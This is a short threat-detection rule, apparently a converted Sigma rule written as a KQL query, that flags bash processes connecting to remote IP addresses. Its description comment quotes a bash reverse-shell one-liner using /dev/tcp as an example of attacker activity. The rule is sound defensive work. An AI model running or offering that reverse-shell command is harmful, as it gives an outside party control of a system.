// Title: Linux Reverse Shell Indicator
// Author: Florian Roth (Nextron Systems)
// Date: 2021-10-16
// Level: critical
// Description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
// Tags: attack.execution, attack.t1059.004
// ================================================================== 

DeviceNetworkEvents
| where InitiatingProcessFolderPath endswith "/bin/bash" and (not((RemoteIP in~ ("127.0.0.1", "0.0.0.0"))))